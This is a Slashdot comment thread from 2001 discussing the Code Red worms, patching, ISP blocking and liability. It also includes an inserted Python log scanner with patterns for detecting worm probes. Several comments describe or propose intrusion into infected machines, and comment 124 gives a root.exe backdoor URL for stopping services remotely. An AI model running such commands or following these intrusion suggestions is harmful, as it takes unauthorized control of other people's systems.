    But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.

    Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.

    1. Re:It's not like they haven't announced the patch by rebelcool · · Score: 2
      Hm, well to design such a system as those you would need to know how to design a really good real-time system. And if you know how to do that, you're not a 'stoopid mcse'.

      Kinda like asking my mom to design a car engine...

      --

      -

    2. Re:It's not like they haven't announced the patch by Syberghost · · Score: 2

      There's also the subtle difference that flaws in Microsoft products don't kill people.

      Don't be so sure; there are Microsoft products in use on the space shuttle, the space station, and Navy warships.

      Even if they're just pushing data around, bad data in those environments can result in death.

  79. Microsoft feature? by sjonke · · Score: 2, Interesting

    Noticing Code Red scanning my OS X Mac, I contacted the owner of the offending machine (actually the net admin on whose network the machine resided) and found out that the user of the computer (a portable) did not even know that he was running IIS.

    --
    --- What?
  80. So doesn't that mean Microsoft was lying? by Myself · · Score: 2

    When Microsoft said that customer data wasn't exposed during the Hotmail infection, wouldn't that seem to contradict what we know about the worm?

  81. Re:make some money off banner ads by TheMidget · · Score: 3, Informative
    > host banner ads on your server with the file name of /default.ida.

    Won't work. The worm won't follow redirects nor download any pictures (banners) from the page.

  82. Code Red is trying to eat me! by sgt_getraer · · Score: 2, Informative

    So I get a call from my ISP Verizon yesterday. They ask me if I have been having problems with the Code Red virus.

    "Nope, but my service is shot to hell. You guys must be having some serious problems."

    The representative goes on to tell me that I can 'fix' the code red virus by unplugging my router and plugging it back in. I try, vainly, to inform him that the virus is doing nothing to my hardware and the reason I'm having problems is that it's making swiss cheese of the SERVERS...

    Anyway, the guy finishes his script and hangs up. So is Verizon trying to cover up their ineptness by implying that the customer is infected, and not them? Proactively trying to shift the blame to get fewer tech support calls? Very strange indeed...

    1. Re:Code Red is trying to eat me! by garcia · · Score: 3, Insightful

      They probably understand the fact that there is VERY little that they can do (other than blocking port 80) than inform their users of what to do. At least they are giving "Worm? I have a worm in my computer? There's no dirt in there" guys the information.

      As much as I hate Verizon and their bullshit, at least they are trying to do something.

      Gotta give em SOME credit ;)

    2. Re:Code Red is trying to eat me! by BeBoxer · · Score: 2

      Code Red will crash some Cisco 675 DSL routers. That's probably why they are calling.

    3. Re:Code Red is trying to eat me! by b1t+r0t · · Score: 2

      If your router is a Cisco and hasn't had a firmware upgrade in the past six months or so, it may have a crashing bug that can be triggered by Code Red's exploit. But if you have _any_ service, this is not the problem, and the guy who called you was a total idiot.

      --

      --
      "Open source is good." - Steve Jobs
      "Open source is evil." - Microsoft
  83. Re:Microsoft should be sued by norton_I · · Score: 2

    The difference between guns and windows is that guns do damage when working as designed. A gun is designed to destroy things you point it at, and that is what it does. It can be used legally or illegally, and manufacturers really can't do much about it.

    IIS is causing damage because of a design flaw. If you bought a gun and it blew up in your hand due to a design flaw, the manufacturer would certainly be at fault.

    I am not convinced that MS should be liable for this, I am just saying that your analogy is flawed, and that in the world of physical products, MS would be hit with a billion dollar lawsuit right now.

  84. huh .. when does the prequel come out ? by freaker_TuC · · Score: 2, Funny

    They should have started with version IV instead of I ...

    then they could do some prequels 10 years later ...

    codered IV: A new hope
    codered V: The code strikes back
    codered VI: Return of the code

    ...

    codered I: The iis menace.

    --
    --- I am known for the ones who want to find me on the net. Is that a privacy risk or a privilege? One might wonder..
  85. Re:Oddly enough... by starseeker · · Score: 2

    That's because car safety has emotional and financial strings attached. You don't see people getting truly upset about computers unless it is either costing them money in a way they can understand easily, or kids are getting into trouble. The issue of poor software design isn't one people can readily understand, just as a physical intruder is easier to understand than an electronic one.

    --
    "I object to doing things that computers can do." -- Olin Shivers, lispers.org
  86. Version 3? Don't think so. by Todd+Knarr · · Score: 5, Insightful

    My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.

    1. Re:Version 3? Don't think so. by grytpype · · Score: 2, Funny

      Oh, so that's why Slashdot sucks so much. Thanks for the info.

      --

      - Have a picture

    2. Re:Version 3? Don't think so. by EvlG · · Score: 2

      Read the /. FAQ. Taco speaks directly to your concern about verifying stories.

      Essentially, it is something like this: Taco sees /. as different from other media, in that readers verify and expound on the stories. /. merely reports the story, with some sanity checking (like not reporting something without even a link). What happens after that is up to the readers.

  87. Re:and another thing... by norton_I · · Score: 2

    I don't have any objection to ISPs doing that *by default*. I just think they should be able to selectively unblock that for customers who want it, with the stipulation that if you or your computer do bad things with it (like get Code Red) they will shut off access completely until you fix it.

    @Home just unilaterally shut off all port 80 access (they have had NetBIOS ports shut off all along, I believe).
    Sure I can move my web server to port 81 or 8080, but as a responsible netizen, it pisses me off that I have to.

    And don't whine about me using your bandwidth. I use my web server for personal use, on a service I paid for. It probably uses a whole 100 KB/day. If ATT@Home can't handle that, they need to upgrade their pipe.

  88. Re:More info on Code Red III by V50 · · Score: 2

    The sad thing is, a while ago one of my Mom's friends, the type who can't understand there is more to a PC than C:\WINDOWS\DESKTOP\, got one something like this in the mail.

    She forwarded it on to everybody she knew, genuinely panicked, wondering how it could do all that, believing every word...

  89. Re:Not SYSTEM-level access.... by SydBarrett · · Score: 2

    "But Code Red II created virtual drives which allowed you to access cmd.exe directly via a corrupt explorer with root rights. So it had a pretty large back door to begin with - I look forward to the analysis of Code Red III if such a thing exists."

    You sure about that? A friend of mine got infected (it's gone now) and told me about it. Just for kicks, I tried the exploit on him. Nothing dangerous, and I let him know in advance what I was doing. When I tried to do a simple "Copy file1 file2", I got an access denied error. Maybe I was doing it wrong, or something. Still, it was fun seeing everything on his hard drive. Anything that was text could be viewed with "type filename", despite missing headers. Hell, with a web server log of infected machines and a port scanner to see if port 80 is still running, you can have lots of fun sneaking around.

    Note: The last part is true with a lot of servers in Japan.

  90. Re:Microsoft should be sued by Keith+Russell · · Score: 3, Informative
    I bet it isn't that hard to do "accidentally"
    Actually, it is. You are never offered the option during the initial installation (i.e. the moment you boot from the CD). You must wait until the entire installation is finished, then select "Add/Remove Windows Components" from the Add/Remove Programs control panel. From there, IIS can be selected. It is not selected by default.
    --
    This sig intentionally left blank.
  91. Re:An ETHICAL way to Anti-Virus by FatOldGoth · · Score: 2

    I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

    I've done something like that already. It actually picks out any entries in the log from the last hour and mails the originators, rather than tailing the log. Help yourself.

    --

    I would be a paid subscriber if Taco and Hemos weren't such cunts
  92. Obviously,IIS is *vastly* more popular then apache by Jerf · · Score: 4, Insightful
    They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

    More popular with whom? If there's anything these worms have shown us, it's that there's a HELL of a lot more IIS installations than anybody would really have guessed, due to the ease of installing it without even realizing it with Windows 2000.

    IIS and Apache may be roughly comparable for "real" websites, but in terms of sheer number of installations, I'd now bet that IIS is creaming apache.

    Before you get too huffy, note this is a bad thing, as it has provided a fertile breeding ground for these worms, while providing little-to-no benefit in return.

    "More lusers with vulnerable web servers than ever before - Microsoft Windows 2000."

  93. Like a Movie ... by mlati · · Score: 2, Funny

    I wonder when Rocky ..uh ..Code Red IV will be released?

  94. Most uninformative article ever by AdamInParadise · · Score: 2

    Well, this article is just empty. It just says "There is a Code Red III" and that's it...

    --
    Nobox: Only simple products.
  95. Someone should post the IP addresses. by Mustang+Matt · · Score: 2

    At first I strongly disagreed with writing an anti-virus that would spread the same way disabling the holes, but shoot after the third edition of this virus, I say post the IPs and let everyone have fun with the servers.

    --
    The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
  96. An ETHICAL way to Anti-Virus by Slur · · Score: 5, Interesting

    Hi,

    I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

    I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

    An example of the email I've been sending is this:

    Hi,

    Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


    This is probably a very minuscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?

    --
    -- thinkyhead software and media
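An added example, not code from any poster in this thread, that does what comments 59, 91 and 96 describe doing by hand: parse Apache access_log lines, flag the padded .ida/.idq requests and the root.exe/cmd.exe probes, group them by source address over the last hour, and fill in a notification like the one above. The log lines, the RFC 5737 addresses, the one-hour window and the 20-character padding threshold are all constructed for the example.

```python
import re
import socket
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access_log lines modelled on the entries quoted in the
# thread; the addresses come from RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG = """\
198.51.100.23 - - [10/Aug/2001:04:11:20 -0700] "GET / HTTP/1.0" 200 7023
198.51.100.23 - - [10/Aug/2001:04:11:20 -0700] "GET /scripts/root.exe HTTP/1.0" 404 210
198.51.100.23 - - [10/Aug/2001:04:11:21 -0700] "GET /MSADC/root.exe HTTP/1.0" 404 208
198.51.100.23 - - [10/Aug/2001:04:11:21 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 218
198.51.100.23 - - [10/Aug/2001:04:11:26 -0700] "GET /NULL.ida?http-42.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X HTTP/1.1" 404 214
203.0.113.77 - - [10/Aug/2001:03:40:05 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN=a HTTP/1.0" 404 267
203.0.113.77 - - [10/Aug/2001:01:02:03 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=a HTTP/1.0" 404 267
192.0.2.9 - - [10/Aug/2001:04:12:00 -0700] "GET /index.html HTTP/1.0" 200 1234
"""

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Code Red pads the .ida/.idq query with a long run of a single character (the
# N/X/A runs people see in their logs); 20 repeats is the constructed threshold.
IDA_RE = re.compile(r'\.id[aq]\?', re.IGNORECASE)
PAD_RE = re.compile(r'(.)\1{19,}')
# Probes for the cmd.exe/root.exe copies that Code Red II leaves reachable.
BACKDOOR_RE = re.compile(r'/(root\.exe|cmd\.exe)(\?|$)', re.IGNORECASE)


def parse_line(line):
    """Return {ip, ts, path, status} for one access_log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def classify(path):
    """Label a request path 'ida_overflow', 'backdoor_probe', or None for ordinary traffic."""
    if IDA_RE.search(path) and PAD_RE.search(path.split("?", 1)[1]):
        return "ida_overflow"
    if BACKDOOR_RE.search(path):
        return "backdoor_probe"
    return None


def scan_log(text, since=None):
    """Group suspicious requests by source IP; `since` (an aware datetime) drops older entries."""
    hits = defaultdict(lambda: {"ida_overflow": 0, "backdoor_probe": 0, "last_seen": None})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or (since is not None and rec["ts"] < since):
            continue
        label = classify(rec["path"])
        if label is None:
            continue
        entry = hits[rec["ip"]]
        entry[label] += 1
        if entry["last_seen"] is None or rec["ts"] > entry["last_seen"]:
            entry["last_seen"] = rec["ts"]
    return dict(hits)


def recent_sources(text, now, window=timedelta(hours=1)):
    """Sorted IPs that sent suspicious requests within `window` before `now` (the 'last hour' approach)."""
    return sorted(scan_log(text, since=now - window))


def reverse_lookup(ip):
    """PTR lookup for the notification text; None when nothing resolves (or there is no network)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def notification(ip, hits, hostname):
    """Fill in the form e-mail with the source IP, its reverse name and what the log shows."""
    name = hostname or "no reverse DNS"
    seen = ", ".join(f"{n} {k.replace('_', ' ')} request(s)"
                     for k, n in hits.items() if k != "last_seen" and n)
    return (
        f"Just a note to let you know that a copy of the Code Red worm is on your "
        f"network attacking my web server. The source IP address is: {ip} "
        f"(reverse lookup: {name}); my log shows {seen}, last at "
        f"{hits['last_seen']:%d/%b/%Y:%H:%M:%S %z}. If this is a customer on your "
        f"network, please pass on that they need to patch and clean their NT/W2K server."
    )


if __name__ == "__main__":
    now = datetime.strptime("10/Aug/2001:04:30:00 -0700", "%d/%b/%Y:%H:%M:%S %z")
    report = scan_log(SAMPLE_LOG)
    for ip in recent_sources(SAMPLE_LOG, now):
        print(notification(ip, report[ip], reverse_lookup(ip)), end="\n\n")
```

Pointing `scan_log` at a real access_log from a cron job gives the hourly sweep comment 91 describes; the reverse lookup is the only step that needs the network.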
  97. Bah. by austad · · Score: 2

    I'm unable to find anymore info on it. Until I see a more comprehensive story, I'm chalking this one up as a gullible journalist (that's redundant) who reports on rumors.

    I haven't noticed anything different in my logs, and I probably should have by now as I've been seeing over 20,000 attempts per day. All are still "NNNNNNNNNN....." (of course, this might be the same with CR3).

    --
    Need Free Juniper/NetScreen Support? JuniperForum
    1. Re:Bah. by mjh · · Score: 4, Informative
      I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

      You might be interested in this article titled, "Securing an unpatchable webserver"

      --
      Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
    2. Re:Bah. by Syberghost · · Score: 3, Insightful

      No, this fun new version is "XXXXXXXX".

      And the only thing I saw wrong in that report is that they believed the companies in question when they reported "isolated" problems that have already been fixed.

      I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

      The pisser is none of MY servers were affected, but I'm still dead in the water because of a bunch of idiots on other teams and projects.

  98. interesting thing about whitehouse.gov by Ryu2 · · Score: 2

    Have you noticed that they are using Akamai now to distribute the content of whitehouse.gov? I guess it's so that they can't be DDOSed in the future with a variant of Code Red (changing the IP address of whitehouse.gov was only a stopgap measure).

    --
    There's 10 types of people in this world, those who understand binary and those who don't.
  99. Re:Code Red IV? by radja · · Score: 2

    what do you think we are..? german lawyers?

    //rdj

    --

    No one can understand the truth until he drinks of coffee's frothy goodness.
    --Sheikh Abd-Al-Kadir, 1587
  100. And the astroturfers sang a new song. by Black+Parrot · · Score: 2

    Last year the astroturfers' chorus was "Who do you sue when something goes dreadfully wrong?"

    Well, something has gone dreadfully wrong. Where are all the lawsuits? Where are all the astroturfers gleefully pointing out that Microsoft's products are better than OSS products, because you can sue Microsoft for your troubles now?

    --
    Sheesh, evil *and* a jerk. -- Jade
  101. Re:Follow-up viruses? by ncc74656 · · Score: 2
    What's to keep someone from writing something that exploits this, looking for boxes that have been patched, and removing the patch - re-enabling the vulnerability to CR? Or surreptitiously opening additional services? Or hell, simply executing del (is that the command in DOS?) c:\?
    NT and Win2K aren't DOS, but DEL is in there. DELTREE is also in NT IIRC, but it isn't in Win2K (not that it'd be hard to copy over Win98's DELTREE and use that).

    An infected server sounds like the ideal place to throw up a warez/pr0n/mp3z site on someone else's nickel...use ftp.exe to fetch a batch file that then builds a directory structure and pulls the files (or "filez," since it's that kind of site) over. If they're too stupid to have patched against CodeRed2, they're probably too stupid to check their logs to find out why their available bandwidth has apparently shrunk to nothing. It'd be an interesting idea to try out, if I had no sense of moral inhibition and/or didn't think I'd get caught. :-)

    Besides, if it's the site of a company you don't particularly like, imagine what would happen if the SPA or BSA came knocking and found Office XP ISOs available for download at http://www.fubared-company.com/warez...

    --
    20 January 2017: the End of an Error.
  102. Code Red infection in spite of patch by shibut · · Score: 2, Interesting

    At work we have a M$ w2k brand new server (installed the last week of July). The server was patched before August 1 and did not have plain vanilla CR. Nevertheless, on Sunday August 6th we still got semi-infected with CRII. I say semi infected since it totally ruined our server's ability to function properly but did not try to infect other machines. When our IT support guy called M$, they claimed we should re-install the patch but went to great lengths to make us re-download the patch from a url they specified (instead of using the patch file we had downloaded at the end of July). This makes me think that maybe they improved the patch since then. Re-installing the patch solved some of the problems and the rest our IT guy had to fix manually.

    We've been CR-free for 2 whole days now

    For the record: I wanted a Linux server but the guys at work (I'm a gal) didn't want to give up the potential to share calendars (they don't actually use it at the moment but options have value on paper at a VC firm...).

  103. Help me out on this one... by mystery_bowler · · Score: 2, Informative

    I understand that Code Red is a worm, but I wish I had more of an understanding of how it really works and what it is really doing. Anyone got a good explanation or link to an explanation?

    --

    My sigs always suck.
    1. Re:Help me out on this one... by Tony-A · · Score: 2, Informative

      What kind of server buffer handler would execute the content of the buffer? You have to go out of your way doing stupid things to make it happen. Who are these morons at Microsoft who write that kind of code?
      Flippant answer: the kind that win benchmarks. Anything that reserves reasonable amounts of memory for variable-length things and cannot or does not ensure that nothing spills outside its limits has this kind of problem, and that's most everything, not just Microsoft. Note that the real problem is not the exploits, it is the unnoticed cases where innocent input corrupts logically unrelated data.

    2. Re:Help me out on this one... by DeadMeat+(TM) · · Score: 5, Informative
      Code Red takes advantage of what's called a "buffer overflow" in Microsoft's IIS web server software.

      What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.

      Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there for -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everything after that number of letters and runs it like it were a program.

      Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.

  104. Serious blow to open source & free software by Sloppy · · Score: 5, Funny

    Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.

    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    1. Re:Serious blow to open source & free software by jmv · · Score: 2

      Sorry, I didn't understand which program you were talking about... I agree with you now ;-)

    2. Re:Serious blow to open source & free software by jmv · · Score: 2

      Even Linux updates don't get distributed this efficiently.

      I don't know how efficient distribution of Linux updates is, but this is certainly not efficient. The different versions of Code Red have been there for more than a month and it doesn't seem to be about to stop. With the amount of publicity there is, you'd expect more people would patch their system. Again, I'm not saying Linux is better on update efficiency, although there seem to be far fewer security holes.

    3. Re:Serious blow to open source & free software by Mike+Schiraldi · · Score: 2, Funny

      I guess this is the Push Technology thing they made such a fuss about a few years ago.

    4. Re:Serious blow to open source & free software by ksheff · · Score: 2

      They also make it sound like IIS is the standard and that Apache is just an alternative. I guess they don't read Netcraft's reports. Just MS PR.

      --
      the good ground has been paved over by suicidal maniacs
  105. Back Door? Somebody call the Goatse.cx guy! by Bonker · · Score: 2

    leaves a wider "back door" on infected machines,

    Code Red II left a copy of cmd.exe in IIS's 'scripts' directory, giving any and all comers who know the machine's IP address the ability to perform *any* system level command with nothing more than a web browser.

    My question here is, how the hell do you have a 'wider' backdoor than that?!

    Tech details are sparse. I haven't seen anything yet. Anyone have links to pages about the new variant's payload?

    --
    The next Slashdot story will be ready soon, but subscribers can beat the rush and slashdot the links early!
  106. Re:Buffer overflow vulnerabilities by TheMidget · · Score: 2, Insightful
    The buffer overflow we're talking about is not in an OS kernel (Windows), but in an application (the IIS webserver), for chrissakes! And yes, there are webservers coded entirely in Perl. For example, webmin's miniserv. And I'm sure, there are webservers entirely coded in Java too (tomcat?).

    The thing is, with Perl and Java, the language's runtime handles memory allocation/de-allocation. And barring a bug in the language itself, there's no way an app written in such language can overflow a buffer. Either the buffer will be grown dynamically to fit the data, or the app will get an exception. But corruption of unrelated data cannot happen in this way.

  107. Gives me an idea to stop it spreading so fast... by chainsaw1 · · Score: 2

    I wonder if you can slow down the worm by stalling the worm's thread process. If you added a default.ida file that, essentially, took forever to return data/download (or at least caused a timeout while waiting to load a file), would the worm slow down?

    Pros: We know the worm only creates 99 threads at a time. This could theoretically stop it spreading

    Cons: Bandwidth limit (stalled download) needs to be used to avoid DDOS-ing yourself.

    Need to kill the connection to keep from memory busting the TCP stack or occupying all available TCP ports.

    You'd basically be playing TCP firewall games based on a request on httpd for hitting a specific file in the website file tree. Scripting that may be difficult or impossible.

    Anyone have any other thoughts?

    --
    - Sig
  108. Re:Linux to the rescue? by Syberghost · · Score: 2

    The bottom line regarding legality isn't what clever logical constructs we can formulate on /.

    The bottom line is what 12 people too stupid to get out of jury duty are going to think, and the average person would think that making use of a hole in order to run code on somebody else's machine without their permission is an intrusion, and thus illegal.

    Your life isn't in danger from the attack on your system, so you have a "duty to retreat" that compels you to shut down your system if necessary, not counterattack.

    I don't agree with it, but there won't be 12 of me on your jury.

  109. I saw that Reuters story earlier by GC · · Score: 4, Interesting

    but I have not seen any instances of attempted infection.

    It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

    I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

  110. make some money off banner ads by SethJohnson · · Score: 5, Insightful

    Taco, I recommend you sign up with one of those online casino sites and host banner ads on your server with the file name of /default.ida. You should be able to rack up a few thousand unique page views a day by pointing the scourge at the scourge (ala Fist Full of Dollars).
  111. Re:Copycats by billh · · Score: 2

    How in the hell did this get moderated up? This thing is active, and will remain active, until EVERY IIS server has been patched. Whether or not the patch even works correctly remains to be seen.

    We'll be seeing this thing for months.

    From one of my servers:

    Report generated on August 10, 2001 at 03:08
    59 Code Red
    525 Code Red II
    584 Total attacks.

    Report generated on August 09, 2001 at 03:08
    76 Code Red
    613 Code Red II
    689 Total attacks.

    Report generated on August 08, 2001 at 03:08
    107 Code Red
    578 Code Red II
    685 Total attacks.

    Report generated on August 07, 2001 at 03:08
    124 Code Red
    419 Code Red II
    543 Total attacks.

  112. Deredoc by RobertGraham · · Score: 2
    http://robertgraham.com/tools/deredoc

    Source compiles on Windows and Linux, binaries available, works with libpcap, can respond back to a range of addresses.

    BTW, this technique has been used since the early-1990s (i.e. I wrote a plugin for the ProTools sniffer that did something like this).

  113. Public Logfile - for *Educational* Purposes Only by BigBlockMopar · · Score: 5, Informative

    I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
    should we set up a site somewhere of ip addrs?

    Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a blithering idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.

    --
    Fire and Meat. Yummy.
  114. Re:Microsoft should be sued by Dr+Caleb · · Score: 2
    Why do poor bastards get sued for using a little bandwidth to participate in an interesting project... [*snip*]... To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Let's look at that, shall we...

    2 patches, ~500k for both. 1 for NT4, one for W2k.
    [20 million 'registered' users] * [8.5 million "gates.bill@microsoft.com" entries] * [2 million bad addresses bouncing both attachments back]= The biggest DOS spam attack in history!

    Exercise for the student: Multiply that by $0,59 for every bit/s it spends in Georgia...give 3 examples.

    --
    "History doesn't repeat itself, but it does rhyme." Mark Twain
  115. CodeRed Information by SpunOne · · Score: 2, Informative

    CodeRed - There were two versions of the original CodeRed worm, both of which were strictly memory resident and fairly tame, all things considered. Both of these will show NNNN's in your log files. You can find more information here.

    CodeRed 2 - This is the worm we're seeing now, the one with the XXXX's in your logs. This worm seems to most frequently scan in its own IP range (Class A I think?) So, if you're in the 24/8 range, you'll probably see a lot of scans from people using various cable providers. You can find more information about CodeRed 2 here.

    So far, I haven't seen anything on the security sites confirming a 3rd version of this worm. The media has often used the term CodeRed3 to describe what is actually CodeRed2, the one giving us grief right now.

    If a new variant of this worm does make it into the wild, it'll be interesting to see how quickly it can spread. It seems that a lot of hosts infected with CR2 give the error (403.9 Too many users connected) when you try to access port 80, which causes the eeye scanner to miss them, and apparently keeps them from being exploited by a new worm. It also keeps people from getting to the /scripts/root.exe that CR2 leaves behind as a backdoor. I'm not sure why IIS would give an error about too many users being connected when in reality, the number of CR hits is around 1-2 a minute. It's likely that the IIS process looks for the number of open sockets and then gives that message if there are too many sockets open. This would make sense since CR2 will open up ~300 connections in its attempt to spread.

    It was also mentioned yesterday that NT4 servers that have been patched are still vulnerable to CR2 if they're using redirection. This seems odd to me, since the patch should have fixed a buffer overflow in idq.dll. If that overflow was fixed and IIS is still crashing, perhaps there is another buffer overflow that's showing up when it gets the long string from CR2 as part of the redirection. Just a guess on my part though.

  116. Re:Microsoft should be sued by blang · · Score: 2

    The average Joe Schmoe is not living in a trailer park. There are tons of middle managers, and others making a decent amount, who would think nothing of paying $100's extra for software, for the same reason that they'd get a Lexus or Mercedes. Of course they need Win2k.

    --
    -- Another senseless waste of fine bytes.
  117. Wow by truthsearch · · Score: 2

    I had to read your post twice, but are you saying that people are installing Win2K and NT with the IIS service automatically running and they haven't noticed??? Wow. The reason I'm surprised is that 2k and NT are usually used by people who are at least a little tech savvy. They're not standard home OSes. I guess I shouldn't be too surprised, but it sure doesn't take a server admin to see the little IIS icon next to your clock with a green arrow showing it's running. Move the mouse over it and it says "IIS - Running". That's pure incompetence on the user's part (and bad design on the OS install to have it run auto by default).

  118. Morality of Counter Measures? by Maul · · Score: 2
    I have a bunch of IPs from my apache logs of attempted attacks on my box. Since I'm running a Linux box, I'm not getting infected, but I was thinking about putting a script on my error page that would SHUT DOWN (not reformat the HD) a compromised box (since the command line is fully available on a compromised machine). I know that this has been suggested...

    My only question is if such a counter measure is moral / legal. Unlike the proposed counter measure worm, this wouldn't propagate. It'd only affect boxes infected with Code Red II. I'm not sure that messing around with the machine of another user, despite my intentions or the infected state of a box, is legal.

    --

    "You spoony bard!" -Tellah

  119. Re:Python has no buffer overflow problems. by Russ+Nelson · · Score: 2

    Nahhahhh. Dan Bernstein uses a different C library in his programs like qmail and djbdns and manages to avoid shooting himself in the root.
    -russ

    --
    Don't piss off The Angry Economist
  120. How about this: by wirefarm · · Score: 2

    Don't patch if it will break other server stuff.
    Turn off IIS.
    Install Apache to your Windows box.
    Problem solved.
    If you can't do that, just turn off IIS, we don't need your content that much.

    Cheers,
    Jim in Tokyo

    --
    -- My Weblog.
  121. Not Legal : Patent Problem by Rashkae · · Score: 2, Funny

    If you did that, you would run afoul McAffee's Patent on Web based virus removal and system administration.

  122. Call in the BSA! by wirefarm · · Score: 2

    I came to the same conclusion that you did - I'm getting hit by home users - ATT.co.jp in my case.
    People with the same dialup connection that I have.
    Where do home users typically get their copy of Win2K or NT Server? Yup, that's right, they 'borrow' it from work.
    So start telling people the 'truth' - That Code Red is actually the BSA's way of rooting out unlicensed Windows installs...
    ;-)
    Pity that the 'default page' on IIS doesn't list the 'Registered User' on it. That would get people turning off unused servers.

    Funny thing is that I had just written the firewall explanation page below as it became very timely - I now get more hits for that than from Code Red.

    Cheers,
    Jim in Tokyo

    --
    -- My Weblog.
  123. Re:Please by Black+Parrot · · Score: 2

    > If Microsoft can't even patch their own servers then how can anyone expect others to do it properly?

    The Register is reporting that the worm is now ravaging Microsoft's internal network, because some foo brought in an infected laptop and plugged it in behind the firewall.

    --
    Sheesh, evil *and* a jerk. -- Jade
  124. Shutting off IIS on a compromised box... by Xibby · · Score: 2

    All it should take is sending a request like this: http://infected.host/scripts/root.exe?/c+start%%20 net%20stop%20ServiceName+c:\\

    Figure out what the service name for IIS is and you can make it do a clean belly flop. No real damage done.

    A full list of the exact services is found in the registry (run regedit.exe) under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services key.

    Other things you could stop are Server and Workstation, and Maybe Simple TCP/IP Services. There is plenty you can do to a NT box with just the command line. And it starts getting really fun after you install the NT resource kit.

    I know more than I ever wanted to know about NT...

    --
    I'm going to go back in my box and will think within the limits of my box: MS Sucks Linux Good I read too much Slashdot.
  125. Re:Better Names by epfreed · · Score: 2, Funny

    How about "Code Red III: Attack of the Clones?"

  126. Thanks for the suggestion by WillSeattle · · Score: 3, Funny

    I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

    OK, it will be ready in an hour, just got to build the array handler routine.

    --
    --- Will in Seattle - What are you doing to fight the War?
  127. Re:Please by truthsearch · · Score: 4, Flamebait

